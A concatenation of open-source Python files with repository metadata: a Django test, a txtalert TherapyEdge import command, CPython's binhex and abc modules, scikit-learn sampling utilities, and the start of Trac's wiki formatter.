self.assertEqual(len(post_save_data), 0)
def test_num_queries_inheritance(self):
s = Employee.objects.create(name='Sara', gender='F')
s.employee_num = 1
s.name = 'Emily'
with self.assertNumQueries(1):
s.save(update_fields=['employee_num'])
s = Employee.objects.get(pk=s.pk)
self.assertEqual(s.employee_num, 1)
self.assertEqual(s.name, 'Sara')
s.employee_num = 2
s.name = 'Emily'
with self.assertNumQueries(1):
s.save(update_fields=['name'])
s = Employee.objects.get(pk=s.pk)
self.assertEqual(s.name, 'Emily')
self.assertEqual(s.employee_num, 1)
# A little sanity check that we actually did updates...
self.assertEqual(Employee.objects.count(), 1)
self.assertEqual(Person.objects.count(), 1)
with self.assertNumQueries(2):
s.save(update_fields=['name', 'employee_num'])
| bsd-3-clause |
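A minimal sketch of the behaviour the tests above exercise, assuming a bare-bones stand-in model (the model and field definitions here are illustrative, not the actual test fixtures):

# Hypothetical illustration of Model.save(update_fields=...).
from django.db import models

class Person(models.Model):
    name = models.CharField(max_length=20)
    gender = models.CharField(max_length=1)

p = Person.objects.create(name='Sara', gender='F')
p.name = 'Ian'
p.gender = 'M'
p.save(update_fields=['name'])      # UPDATE touches only the name column
fresh = Person.objects.get(pk=p.pk)
assert fresh.name == 'Ian'          # persisted
assert fresh.gender == 'F'          # skipped: not listed in update_fields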
praekelt/txtalert | txtalert/apps/therapyedge/management/commands/te_import_test.py | 1 | 3299 | from datetime import datetime, timedelta
from django.utils import timezone
from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
from django.conf import settings
from optparse import make_option
from txtalert.apps.general.settings.models import Setting
from txtalert.apps.therapyedge.importer import Importer
from txtalert.core.models import Clinic
import sys
class Command(BaseCommand):
help = "Can be run as a cronjob or directly to send import TherapyEdge data."
    option_list = BaseCommand.option_list + (
        make_option('--username', dest='username',
            help='Specifies the user to import for.'),
        make_option('--te_ids', dest='te_ids',
            help='Specifies the te_ids (comma-separated) to test for.'),
        make_option('--days_back', dest='days_back',
            help='Specifies the backward date range offset, default = 1'),
        make_option('--days_forward', dest='days_forward',
            help='Specifies the forward date range offset, default = 30'),
    )
def handle(self, *args, **kwargs):
importer = Importer(
uri='https://%s:%s@41.0.13.99/tools/ws/sms/patients/server.php' % (
Setting.objects.get(name='THERAPYEDGE_USERNAME').value,
Setting.objects.get(name='THERAPYEDGE_PASSWORD').value
),
verbose=settings.DEBUG
)
username = kwargs.get('username')
if not username:
sys.exit('Please provide --username')
te_ids = kwargs.get('te_ids')
if not te_ids:
sys.exit('Please provide --te_ids')
te_id_list = te_ids.split(',')
print "\nSearching coming, missed, done and deleted visits for " \
"te_id's in:\n%s" % repr(te_id_list)
days_back = int(kwargs.get('days_back') or 1)
print "From %s days back" % days_back
days_forward = int(kwargs.get('days_forward') or 30)
print "to %s days forward\n" % days_forward
user = User.objects.get(username=username)
for clinic in Clinic.objects.filter(active=True, user=user):
print "Clinic name: %s" % clinic.name
print "Clinic id: %s" % clinic.te_id
midnight = timezone.now().replace(
hour=0,
minute=0,
second=0,
microsecond=0
)
since = midnight - timedelta(days=days_back)
until = midnight + timedelta(days=days_forward)
print "Since: %s" % since
print "Until: %s" % until
for v in importer.client.get_coming_visits(clinic.te_id, since, until):
if v.te_id in te_id_list:
print "\t%s" % repr(v)
for v in importer.client.get_missed_visits(clinic.te_id, since, until):
if v.te_id in te_id_list:
print "\t%s" % repr(v)
for v in importer.client.get_done_visits(clinic.te_id, since, until):
if v.te_id in te_id_list:
print "\t%s" % repr(v)
for v in importer.client.get_deleted_visits(clinic.te_id, since, until):
if v.te_id in te_id_list:
print "\t%s" % repr(v)
print ''
| gpl-3.0 |
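For reference, a hypothetical way to drive the command above from code; the argument values below are invented placeholders:

# Assumed usage via Django's management API (values are made up).
from django.core.management import call_command

call_command('te_import_test',
             username='clinic_admin',    # must match an existing User
             te_ids='01-1234,01-5678',   # comma-separated, as split in handle()
             days_back='2',
             days_forward='14')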
fhaoquan/kbengine | kbe/src/lib/python/Lib/binhex.py | 89 | 13708 | """Macintosh binhex compression/decompression.
easy interface:
binhex(inputfilename, outputfilename)
hexbin(inputfilename, outputfilename)
"""
#
# Jack Jansen, CWI, August 1995.
#
# The module is supposed to be as compatible as possible. Especially the
# easy interface should work "as expected" on any platform.
# XXXX Note: currently, textfiles appear in mac-form on all platforms.
# We seem to lack a simple character-translate in python.
# (we should probably use ISO-Latin-1 on all but the mac platform).
# XXXX The simple routines are too simple: they expect to hold the complete
# files in-core. Should be fixed.
# XXXX It would be nice to handle AppleDouble format on unix
# (for servers serving macs).
# XXXX I don't understand what happens when you get 0x90 times the same byte on
# input. The resulting code (xx 90 90) would appear to be interpreted as an
# escaped *value* of 0x90. All coders I've seen appear to ignore this nicety...
#
import io
import os
import struct
import binascii
__all__ = ["binhex","hexbin","Error"]
class Error(Exception):
pass
# States (what have we written)
[_DID_HEADER, _DID_DATA, _DID_RSRC] = range(3)
# Various constants
REASONABLY_LARGE = 32768 # Minimal amount we pass the rle-coder
LINELEN = 64
RUNCHAR = b"\x90"
#
# This code is no longer byte-order dependent
class FInfo:
def __init__(self):
self.Type = '????'
self.Creator = '????'
self.Flags = 0
def getfileinfo(name):
finfo = FInfo()
with io.open(name, 'rb') as fp:
# Quick check for textfile
data = fp.read(512)
if 0 not in data:
finfo.Type = 'TEXT'
fp.seek(0, 2)
dsize = fp.tell()
dir, file = os.path.split(name)
file = file.replace(':', '-', 1)
return file, finfo, dsize, 0
class openrsrc:
def __init__(self, *args):
pass
def read(self, *args):
return b''
def write(self, *args):
pass
def close(self):
pass
class _Hqxcoderengine:
"""Write data to the coder in 3-byte chunks"""
def __init__(self, ofp):
self.ofp = ofp
self.data = b''
self.hqxdata = b''
self.linelen = LINELEN - 1
def write(self, data):
self.data = self.data + data
datalen = len(self.data)
todo = (datalen // 3) * 3
data = self.data[:todo]
self.data = self.data[todo:]
if not data:
return
self.hqxdata = self.hqxdata + binascii.b2a_hqx(data)
self._flush(0)
def _flush(self, force):
first = 0
while first <= len(self.hqxdata) - self.linelen:
last = first + self.linelen
self.ofp.write(self.hqxdata[first:last] + b'\n')
self.linelen = LINELEN
first = last
self.hqxdata = self.hqxdata[first:]
if force:
self.ofp.write(self.hqxdata + b':\n')
def close(self):
if self.data:
self.hqxdata = self.hqxdata + binascii.b2a_hqx(self.data)
self._flush(1)
self.ofp.close()
del self.ofp
class _Rlecoderengine:
"""Write data to the RLE-coder in suitably large chunks"""
def __init__(self, ofp):
self.ofp = ofp
self.data = b''
def write(self, data):
self.data = self.data + data
if len(self.data) < REASONABLY_LARGE:
return
rledata = binascii.rlecode_hqx(self.data)
self.ofp.write(rledata)
self.data = b''
def close(self):
if self.data:
rledata = binascii.rlecode_hqx(self.data)
self.ofp.write(rledata)
self.ofp.close()
del self.ofp
class BinHex:
def __init__(self, name_finfo_dlen_rlen, ofp):
name, finfo, dlen, rlen = name_finfo_dlen_rlen
close_on_error = False
if isinstance(ofp, str):
ofname = ofp
ofp = io.open(ofname, 'wb')
close_on_error = True
try:
ofp.write(b'(This file must be converted with BinHex 4.0)\r\r:')
hqxer = _Hqxcoderengine(ofp)
self.ofp = _Rlecoderengine(hqxer)
self.crc = 0
if finfo is None:
finfo = FInfo()
self.dlen = dlen
self.rlen = rlen
self._writeinfo(name, finfo)
self.state = _DID_HEADER
except:
if close_on_error:
ofp.close()
raise
def _writeinfo(self, name, finfo):
nl = len(name)
if nl > 63:
raise Error('Filename too long')
d = bytes([nl]) + name.encode("latin-1") + b'\0'
tp, cr = finfo.Type, finfo.Creator
if isinstance(tp, str):
tp = tp.encode("latin-1")
if isinstance(cr, str):
cr = cr.encode("latin-1")
d2 = tp + cr
# Force all structs to be packed with big-endian
d3 = struct.pack('>h', finfo.Flags)
d4 = struct.pack('>ii', self.dlen, self.rlen)
info = d + d2 + d3 + d4
self._write(info)
self._writecrc()
def _write(self, data):
self.crc = binascii.crc_hqx(data, self.crc)
self.ofp.write(data)
def _writecrc(self):
# XXXX Should this be here??
# self.crc = binascii.crc_hqx('\0\0', self.crc)
if self.crc < 0:
fmt = '>h'
else:
fmt = '>H'
self.ofp.write(struct.pack(fmt, self.crc))
self.crc = 0
def write(self, data):
if self.state != _DID_HEADER:
raise Error('Writing data at the wrong time')
self.dlen = self.dlen - len(data)
self._write(data)
def close_data(self):
if self.dlen != 0:
            raise Error('Incorrect data size, diff=%r' % (self.dlen,))
self._writecrc()
self.state = _DID_DATA
def write_rsrc(self, data):
if self.state < _DID_DATA:
self.close_data()
if self.state != _DID_DATA:
raise Error('Writing resource data at the wrong time')
self.rlen = self.rlen - len(data)
self._write(data)
def close(self):
if self.state < _DID_DATA:
self.close_data()
if self.state != _DID_DATA:
raise Error('Close at the wrong time')
if self.rlen != 0:
raise Error("Incorrect resource-datasize, diff=%r" % (self.rlen,))
self._writecrc()
self.ofp.close()
self.state = None
del self.ofp
def binhex(inp, out):
"""binhex(infilename, outfilename): create binhex-encoded copy of a file"""
finfo = getfileinfo(inp)
ofp = BinHex(finfo, out)
ifp = io.open(inp, 'rb')
# XXXX Do textfile translation on non-mac systems
while True:
d = ifp.read(128000)
if not d: break
ofp.write(d)
ofp.close_data()
ifp.close()
ifp = openrsrc(inp, 'rb')
while True:
d = ifp.read(128000)
if not d: break
ofp.write_rsrc(d)
ofp.close()
ifp.close()
class _Hqxdecoderengine:
"""Read data via the decoder in 4-byte chunks"""
def __init__(self, ifp):
self.ifp = ifp
self.eof = 0
def read(self, totalwtd):
"""Read at least wtd bytes (or until EOF)"""
decdata = b''
wtd = totalwtd
#
        # The loop here is convoluted, since we don't really know how
# much to decode: there may be newlines in the incoming data.
while wtd > 0:
if self.eof: return decdata
wtd = ((wtd + 2) // 3) * 4
data = self.ifp.read(wtd)
#
# Next problem: there may not be a complete number of
# bytes in what we pass to a2b. Solve by yet another
# loop.
#
while True:
try:
decdatacur, self.eof = binascii.a2b_hqx(data)
break
except binascii.Incomplete:
pass
newdata = self.ifp.read(1)
if not newdata:
raise Error('Premature EOF on binhex file')
data = data + newdata
decdata = decdata + decdatacur
wtd = totalwtd - len(decdata)
if not decdata and not self.eof:
raise Error('Premature EOF on binhex file')
return decdata
def close(self):
self.ifp.close()
class _Rledecoderengine:
"""Read data via the RLE-coder"""
def __init__(self, ifp):
self.ifp = ifp
self.pre_buffer = b''
self.post_buffer = b''
self.eof = 0
def read(self, wtd):
if wtd > len(self.post_buffer):
self._fill(wtd - len(self.post_buffer))
rv = self.post_buffer[:wtd]
self.post_buffer = self.post_buffer[wtd:]
return rv
def _fill(self, wtd):
self.pre_buffer = self.pre_buffer + self.ifp.read(wtd + 4)
if self.ifp.eof:
self.post_buffer = self.post_buffer + \
binascii.rledecode_hqx(self.pre_buffer)
self.pre_buffer = b''
return
#
# Obfuscated code ahead. We have to take care that we don't
# end up with an orphaned RUNCHAR later on. So, we keep a couple
# of bytes in the buffer, depending on what the end of
# the buffer looks like:
# '\220\0\220' - Keep 3 bytes: repeated \220 (escaped as \220\0)
# '?\220' - Keep 2 bytes: repeated something-else
# '\220\0' - Escaped \220: Keep 2 bytes.
# '?\220?' - Complete repeat sequence: decode all
# otherwise: keep 1 byte.
#
mark = len(self.pre_buffer)
if self.pre_buffer[-3:] == RUNCHAR + b'\0' + RUNCHAR:
mark = mark - 3
elif self.pre_buffer[-1:] == RUNCHAR:
mark = mark - 2
elif self.pre_buffer[-2:] == RUNCHAR + b'\0':
mark = mark - 2
elif self.pre_buffer[-2:-1] == RUNCHAR:
pass # Decode all
else:
mark = mark - 1
self.post_buffer = self.post_buffer + \
binascii.rledecode_hqx(self.pre_buffer[:mark])
self.pre_buffer = self.pre_buffer[mark:]
def close(self):
self.ifp.close()
class HexBin:
def __init__(self, ifp):
if isinstance(ifp, str):
ifp = io.open(ifp, 'rb')
#
# Find initial colon.
#
while True:
ch = ifp.read(1)
if not ch:
raise Error("No binhex data found")
# Cater for \r\n terminated lines (which show up as \n\r, hence
# all lines start with \r)
if ch == b'\r':
continue
if ch == b':':
break
hqxifp = _Hqxdecoderengine(ifp)
self.ifp = _Rledecoderengine(hqxifp)
self.crc = 0
self._readheader()
def _read(self, len):
data = self.ifp.read(len)
self.crc = binascii.crc_hqx(data, self.crc)
return data
def _checkcrc(self):
filecrc = struct.unpack('>h', self.ifp.read(2))[0] & 0xffff
#self.crc = binascii.crc_hqx('\0\0', self.crc)
# XXXX Is this needed??
self.crc = self.crc & 0xffff
if filecrc != self.crc:
raise Error('CRC error, computed %x, read %x'
% (self.crc, filecrc))
self.crc = 0
def _readheader(self):
len = self._read(1)
fname = self._read(ord(len))
rest = self._read(1 + 4 + 4 + 2 + 4 + 4)
self._checkcrc()
type = rest[1:5]
creator = rest[5:9]
flags = struct.unpack('>h', rest[9:11])[0]
self.dlen = struct.unpack('>l', rest[11:15])[0]
self.rlen = struct.unpack('>l', rest[15:19])[0]
self.FName = fname
self.FInfo = FInfo()
self.FInfo.Creator = creator
self.FInfo.Type = type
self.FInfo.Flags = flags
self.state = _DID_HEADER
def read(self, *n):
if self.state != _DID_HEADER:
raise Error('Read data at wrong time')
if n:
n = n[0]
n = min(n, self.dlen)
else:
n = self.dlen
rv = b''
while len(rv) < n:
rv = rv + self._read(n-len(rv))
self.dlen = self.dlen - n
return rv
def close_data(self):
if self.state != _DID_HEADER:
raise Error('close_data at wrong time')
if self.dlen:
dummy = self._read(self.dlen)
self._checkcrc()
self.state = _DID_DATA
def read_rsrc(self, *n):
if self.state == _DID_HEADER:
self.close_data()
if self.state != _DID_DATA:
raise Error('Read resource data at wrong time')
if n:
n = n[0]
n = min(n, self.rlen)
else:
n = self.rlen
self.rlen = self.rlen - n
return self._read(n)
def close(self):
if self.rlen:
dummy = self.read_rsrc(self.rlen)
self._checkcrc()
self.state = _DID_RSRC
self.ifp.close()
def hexbin(inp, out):
"""hexbin(infilename, outfilename) - Decode binhexed file"""
ifp = HexBin(inp)
finfo = ifp.FInfo
if not out:
out = ifp.FName
ofp = io.open(out, 'wb')
# XXXX Do translation on non-mac systems
while True:
d = ifp.read(128000)
if not d: break
ofp.write(d)
ofp.close()
ifp.close_data()
d = ifp.read_rsrc(128000)
if d:
ofp = openrsrc(out, 'wb')
ofp.write(d)
while True:
d = ifp.read_rsrc(128000)
if not d: break
ofp.write(d)
ofp.close()
ifp.close()
| lgpl-3.0 |
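A quick round-trip sketch using the module's two public helpers; the file names are placeholders:

# Hypothetical usage of binhex()/hexbin() defined above.
import binhex

binhex.binhex('report.txt', 'report.hqx')            # encode to BinHex 4.0
binhex.hexbin('report.hqx', 'report_roundtrip.txt')  # decode it back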
40223119/w16b_test | static/Brython3.1.0-20150301-090019/Lib/abc.py | 765 | 8057 | # Copyright 2007 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Abstract Base Classes (ABCs) according to PEP 3119."""
from _weakrefset import WeakSet
def abstractmethod(funcobj):
"""A decorator indicating abstract methods.
Requires that the metaclass is ABCMeta or derived from it. A
class that has a metaclass derived from ABCMeta cannot be
instantiated unless all of its abstract methods are overridden.
The abstract methods can be called using any of the normal
'super' call mechanisms.
Usage:
class C(metaclass=ABCMeta):
@abstractmethod
def my_abstract_method(self, ...):
...
"""
funcobj.__isabstractmethod__ = True
return funcobj
class abstractclassmethod(classmethod):
"""
A decorator indicating abstract classmethods.
Similar to abstractmethod.
Usage:
class C(metaclass=ABCMeta):
@abstractclassmethod
def my_abstract_classmethod(cls, ...):
...
'abstractclassmethod' is deprecated. Use 'classmethod' with
'abstractmethod' instead.
"""
__isabstractmethod__ = True
def __init__(self, callable):
callable.__isabstractmethod__ = True
super().__init__(callable)
class abstractstaticmethod(staticmethod):
"""
A decorator indicating abstract staticmethods.
Similar to abstractmethod.
Usage:
class C(metaclass=ABCMeta):
@abstractstaticmethod
def my_abstract_staticmethod(...):
...
'abstractstaticmethod' is deprecated. Use 'staticmethod' with
'abstractmethod' instead.
"""
__isabstractmethod__ = True
def __init__(self, callable):
callable.__isabstractmethod__ = True
super().__init__(callable)
class abstractproperty(property):
"""
A decorator indicating abstract properties.
Requires that the metaclass is ABCMeta or derived from it. A
class that has a metaclass derived from ABCMeta cannot be
instantiated unless all of its abstract properties are overridden.
The abstract properties can be called using any of the normal
'super' call mechanisms.
Usage:
class C(metaclass=ABCMeta):
@abstractproperty
def my_abstract_property(self):
...
This defines a read-only property; you can also define a read-write
abstract property using the 'long' form of property declaration:
class C(metaclass=ABCMeta):
def getx(self): ...
def setx(self, value): ...
x = abstractproperty(getx, setx)
'abstractproperty' is deprecated. Use 'property' with 'abstractmethod'
instead.
"""
__isabstractmethod__ = True
class ABCMeta(type):
"""Metaclass for defining Abstract Base Classes (ABCs).
Use this metaclass to create an ABC. An ABC can be subclassed
directly, and then acts as a mix-in class. You can also register
unrelated concrete classes (even built-in classes) and unrelated
ABCs as 'virtual subclasses' -- these and their descendants will
be considered subclasses of the registering ABC by the built-in
issubclass() function, but the registering ABC won't show up in
their MRO (Method Resolution Order) nor will method
implementations defined by the registering ABC be callable (not
even via super()).
"""
# A global counter that is incremented each time a class is
# registered as a virtual subclass of anything. It forces the
# negative cache to be cleared before its next use.
_abc_invalidation_counter = 0
def __new__(mcls, name, bases, namespace):
cls = super().__new__(mcls, name, bases, namespace)
# Compute set of abstract method names
abstracts = {name
for name, value in namespace.items()
if getattr(value, "__isabstractmethod__", False)}
for base in bases:
for name in getattr(base, "__abstractmethods__", set()):
value = getattr(cls, name, None)
if getattr(value, "__isabstractmethod__", False):
abstracts.add(name)
cls.__abstractmethods__ = frozenset(abstracts)
# Set up inheritance registry
cls._abc_registry = WeakSet()
cls._abc_cache = WeakSet()
cls._abc_negative_cache = WeakSet()
cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter
return cls
def register(cls, subclass):
"""Register a virtual subclass of an ABC.
Returns the subclass, to allow usage as a class decorator.
"""
if not isinstance(subclass, type):
raise TypeError("Can only register classes")
if issubclass(subclass, cls):
return subclass # Already a subclass
# Subtle: test for cycles *after* testing for "already a subclass";
# this means we allow X.register(X) and interpret it as a no-op.
if issubclass(cls, subclass):
# This would create a cycle, which is bad for the algorithm below
raise RuntimeError("Refusing to create an inheritance cycle")
cls._abc_registry.add(subclass)
ABCMeta._abc_invalidation_counter += 1 # Invalidate negative cache
return subclass
def _dump_registry(cls, file=None):
"""Debug helper to print the ABC registry."""
print("Class: %s.%s" % (cls.__module__, cls.__name__), file=file)
print("Inv.counter: %s" % ABCMeta._abc_invalidation_counter, file=file)
for name in sorted(cls.__dict__.keys()):
if name.startswith("_abc_"):
value = getattr(cls, name)
print("%s: %r" % (name, value), file=file)
def __instancecheck__(cls, instance):
"""Override for isinstance(instance, cls)."""
# Inline the cache checking
subclass = instance.__class__
if subclass in cls._abc_cache:
return True
subtype = type(instance)
if subtype is subclass:
if (cls._abc_negative_cache_version ==
ABCMeta._abc_invalidation_counter and
subclass in cls._abc_negative_cache):
return False
# Fall back to the subclass check.
return cls.__subclasscheck__(subclass)
return any(cls.__subclasscheck__(c) for c in {subclass, subtype})
def __subclasscheck__(cls, subclass):
"""Override for issubclass(subclass, cls)."""
# Check cache
if subclass in cls._abc_cache:
return True
# Check negative cache; may have to invalidate
if cls._abc_negative_cache_version < ABCMeta._abc_invalidation_counter:
# Invalidate the negative cache
cls._abc_negative_cache = WeakSet()
cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter
elif subclass in cls._abc_negative_cache:
return False
# Check the subclass hook
ok = cls.__subclasshook__(subclass)
if ok is not NotImplemented:
assert isinstance(ok, bool)
if ok:
cls._abc_cache.add(subclass)
else:
cls._abc_negative_cache.add(subclass)
return ok
# Check if it's a direct subclass
if cls in getattr(subclass, '__mro__', ()):
cls._abc_cache.add(subclass)
return True
# Check if it's a subclass of a registered class (recursive)
for rcls in cls._abc_registry:
if issubclass(subclass, rcls):
cls._abc_cache.add(subclass)
return True
# Check if it's a subclass of a subclass (recursive)
for scls in cls.__subclasses__():
if issubclass(subclass, scls):
cls._abc_cache.add(subclass)
return True
# No dice; update negative cache
cls._abc_negative_cache.add(subclass)
return False
| gpl-3.0 |
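A small usage sketch of the ABCMeta machinery above; the class names are invented for illustration:

# Hypothetical example: abstract method plus virtual-subclass registration.
from abc import ABCMeta, abstractmethod

class Serializer(metaclass=ABCMeta):
    @abstractmethod
    def dumps(self, obj):
        ...

class ReprSerializer:                  # unrelated concrete class
    def dumps(self, obj):
        return repr(obj)

Serializer.register(ReprSerializer)              # becomes a virtual subclass
assert issubclass(ReprSerializer, Serializer)    # satisfied via the registry
assert isinstance(ReprSerializer(), Serializer)
# Serializer() itself raises TypeError: dumps() is still abstract.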
shyamalschandra/scikit-learn | sklearn/utils/random.py | 234 | 10510 | # Author: Hamzeh Alsalhi <ha258@cornell.edu>
#
# License: BSD 3 clause
from __future__ import division
import numpy as np
import scipy.sparse as sp
import operator
import array
from sklearn.utils import check_random_state
from sklearn.utils.fixes import astype
from ._random import sample_without_replacement
__all__ = ['sample_without_replacement', 'choice']
# This is a backport of np.random.choice from numpy 1.7
# The function can be removed when we bump the requirements to >=1.7
def choice(a, size=None, replace=True, p=None, random_state=None):
"""
choice(a, size=None, replace=True, p=None)
Generates a random sample from a given 1-D array
.. versionadded:: 1.7.0
Parameters
-----------
a : 1-D array-like or int
If an ndarray, a random sample is generated from its elements.
If an int, the random sample is generated as if a was np.arange(n)
size : int or tuple of ints, optional
Output shape. Default is None, in which case a single value is
returned.
replace : boolean, optional
Whether the sample is with or without replacement.
p : 1-D array-like, optional
The probabilities associated with each entry in a.
        If not given, the sample assumes a uniform distribution over all
entries in a.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
--------
samples : 1-D ndarray, shape (size,)
The generated random samples
Raises
-------
ValueError
If a is an int and less than zero, if a or p are not 1-dimensional,
if a is an array-like of size 0, if p is not a vector of
probabilities, if a and p have different lengths, or if
replace=False and the sample size is greater than the population
size
See Also
---------
randint, shuffle, permutation
Examples
---------
Generate a uniform random sample from np.arange(5) of size 3:
>>> np.random.choice(5, 3) # doctest: +SKIP
array([0, 3, 4])
>>> #This is equivalent to np.random.randint(0,5,3)
Generate a non-uniform random sample from np.arange(5) of size 3:
>>> np.random.choice(5, 3, p=[0.1, 0, 0.3, 0.6, 0]) # doctest: +SKIP
array([3, 3, 0])
Generate a uniform random sample from np.arange(5) of size 3 without
replacement:
>>> np.random.choice(5, 3, replace=False) # doctest: +SKIP
array([3,1,0])
>>> #This is equivalent to np.random.shuffle(np.arange(5))[:3]
Generate a non-uniform random sample from np.arange(5) of size
3 without replacement:
>>> np.random.choice(5, 3, replace=False, p=[0.1, 0, 0.3, 0.6, 0])
... # doctest: +SKIP
array([2, 3, 0])
Any of the above can be repeated with an arbitrary array-like
instead of just integers. For instance:
>>> aa_milne_arr = ['pooh', 'rabbit', 'piglet', 'Christopher']
>>> np.random.choice(aa_milne_arr, 5, p=[0.5, 0.1, 0.1, 0.3])
... # doctest: +SKIP
array(['pooh', 'pooh', 'pooh', 'Christopher', 'piglet'],
dtype='|S11')
"""
random_state = check_random_state(random_state)
# Format and Verify input
a = np.array(a, copy=False)
if a.ndim == 0:
try:
# __index__ must return an integer by python rules.
pop_size = operator.index(a.item())
except TypeError:
raise ValueError("a must be 1-dimensional or an integer")
if pop_size <= 0:
raise ValueError("a must be greater than 0")
elif a.ndim != 1:
raise ValueError("a must be 1-dimensional")
else:
pop_size = a.shape[0]
        if pop_size == 0:
raise ValueError("a must be non-empty")
    if p is not None:
p = np.array(p, dtype=np.double, ndmin=1, copy=False)
if p.ndim != 1:
raise ValueError("p must be 1-dimensional")
if p.size != pop_size:
raise ValueError("a and p must have same size")
if np.any(p < 0):
raise ValueError("probabilities are not non-negative")
if not np.allclose(p.sum(), 1):
raise ValueError("probabilities do not sum to 1")
shape = size
if shape is not None:
size = np.prod(shape, dtype=np.intp)
else:
size = 1
# Actual sampling
if replace:
        if p is not None:
cdf = p.cumsum()
cdf /= cdf[-1]
uniform_samples = random_state.random_sample(shape)
idx = cdf.searchsorted(uniform_samples, side='right')
# searchsorted returns a scalar
idx = np.array(idx, copy=False)
else:
idx = random_state.randint(0, pop_size, size=shape)
else:
if size > pop_size:
raise ValueError("Cannot take a larger sample than "
"population when 'replace=False'")
        if p is not None:
if np.sum(p > 0) < size:
raise ValueError("Fewer non-zero entries in p than size")
n_uniq = 0
p = p.copy()
found = np.zeros(shape, dtype=np.int)
flat_found = found.ravel()
while n_uniq < size:
x = random_state.rand(size - n_uniq)
if n_uniq > 0:
p[flat_found[0:n_uniq]] = 0
cdf = np.cumsum(p)
cdf /= cdf[-1]
new = cdf.searchsorted(x, side='right')
_, unique_indices = np.unique(new, return_index=True)
unique_indices.sort()
new = new.take(unique_indices)
flat_found[n_uniq:n_uniq + new.size] = new
n_uniq += new.size
idx = found
else:
idx = random_state.permutation(pop_size)[:size]
if shape is not None:
idx.shape = shape
if shape is None and isinstance(idx, np.ndarray):
# In most cases a scalar will have been made an array
idx = idx.item(0)
# Use samples as indices for a if a is array-like
if a.ndim == 0:
return idx
if shape is not None and idx.ndim == 0:
# If size == () then the user requested a 0-d array as opposed to
# a scalar object when size is None. However a[idx] is always a
# scalar and not an array. So this makes sure the result is an
# array, taking into account that np.array(item) may not work
# for object arrays.
res = np.empty((), dtype=a.dtype)
res[()] = a[idx]
return res
return a[idx]
def random_choice_csc(n_samples, classes, class_probability=None,
random_state=None):
"""Generate a sparse random matrix given column class distributions
Parameters
----------
n_samples : int,
Number of samples to draw in each column.
classes : list of size n_outputs of arrays of size (n_classes,)
List of classes for each column.
class_probability : list of size n_outputs of arrays of size (n_classes,)
Optional (default=None). Class distribution of each column. If None the
uniform distribution is assumed.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
-------
random_matrix : sparse csc matrix of size (n_samples, n_outputs)
"""
data = array.array('i')
indices = array.array('i')
indptr = array.array('i', [0])
for j in range(len(classes)):
classes[j] = np.asarray(classes[j])
if classes[j].dtype.kind != 'i':
raise ValueError("class dtype %s is not supported" %
classes[j].dtype)
classes[j] = astype(classes[j], np.int64, copy=False)
# use uniform distribution if no class_probability is given
if class_probability is None:
class_prob_j = np.empty(shape=classes[j].shape[0])
class_prob_j.fill(1 / classes[j].shape[0])
else:
class_prob_j = np.asarray(class_probability[j])
        if not np.allclose(np.sum(class_prob_j), 1.0):
raise ValueError("Probability array at index {0} does not sum to "
"one".format(j))
if class_prob_j.shape[0] != classes[j].shape[0]:
raise ValueError("classes[{0}] (length {1}) and "
"class_probability[{0}] (length {2}) have "
"different length.".format(j,
classes[j].shape[0],
class_prob_j.shape[0]))
# If 0 is not present in the classes insert it with a probability 0.0
if 0 not in classes[j]:
classes[j] = np.insert(classes[j], 0, 0)
class_prob_j = np.insert(class_prob_j, 0, 0.0)
# If there are nonzero classes choose randomly using class_probability
rng = check_random_state(random_state)
if classes[j].shape[0] > 1:
p_nonzero = 1 - class_prob_j[classes[j] == 0]
nnz = int(n_samples * p_nonzero)
ind_sample = sample_without_replacement(n_population=n_samples,
n_samples=nnz,
random_state=random_state)
indices.extend(ind_sample)
            # Normalize probabilities for the nonzero elements
classes_j_nonzero = classes[j] != 0
class_probability_nz = class_prob_j[classes_j_nonzero]
class_probability_nz_norm = (class_probability_nz /
np.sum(class_probability_nz))
classes_ind = np.searchsorted(class_probability_nz_norm.cumsum(),
rng.rand(nnz))
data.extend(classes[j][classes_j_nonzero][classes_ind])
indptr.append(len(indices))
return sp.csc_matrix((data, indices, indptr),
(n_samples, len(classes)),
dtype=int)
| bsd-3-clause |
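A brief usage sketch for the two helpers above; the seed and probability values are arbitrary:

# Hypothetical calls to choice() and random_choice_csc().
import numpy as np
from sklearn.utils.random import choice, random_choice_csc

# Weighted sampling without replacement, mirroring the docstring examples.
sample = choice(5, 3, replace=False, p=[0.1, 0.0, 0.3, 0.6, 0.0],
                random_state=0)

# A 10x1 sparse CSC matrix of draws over the classes {0, 1, 2}.
m = random_choice_csc(10, [np.array([0, 1, 2])],
                      class_probability=[np.array([0.5, 0.25, 0.25])],
                      random_state=0)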
rbaumg/trac | trac/wiki/formatter.py | 1 | 63756 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2003-2019 Edgewall Software
# Copyright (C) 2003-2005 Jonas Borgström <jonas@edgewall.com>
# Copyright (C) 2004-2005 Christopher Lenz <cmlenz@gmx.de>
# Copyright (C) 2005-2007 Christian Boos <cboos@edgewall.org>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
#
# Author: Jonas Borgström <jonas@edgewall.com>
# Christopher Lenz <cmlenz@gmx.de>
# Christian Boos <cboos@edgewall.org>
from HTMLParser import HTMLParseError
import io
import re
from trac.core import *
from trac.mimeview import *
from trac.resource import get_relative_resource, get_resource_url
from trac.util import arity, as_int
from trac.util.text import (
exception_to_unicode, shorten_line, to_unicode, unicode_quote,
unquote_label
)
from trac.util.html import (
Element, Fragment, Markup, Stream, TracHTMLSanitizer, escape, genshi,
plaintext, stream_to_unicode, tag, to_fragment
)
from trac.util.translation import _, tag_
from trac.wiki.api import WikiSystem, parse_args
from trac.wiki.parser import WikiParser, parse_processor_args
__all__ = ['Formatter', 'MacroError', 'ProcessorError',
'concat_path_query_fragment', 'extract_link', 'format_to',
'format_to_html', 'format_to_oneliner',
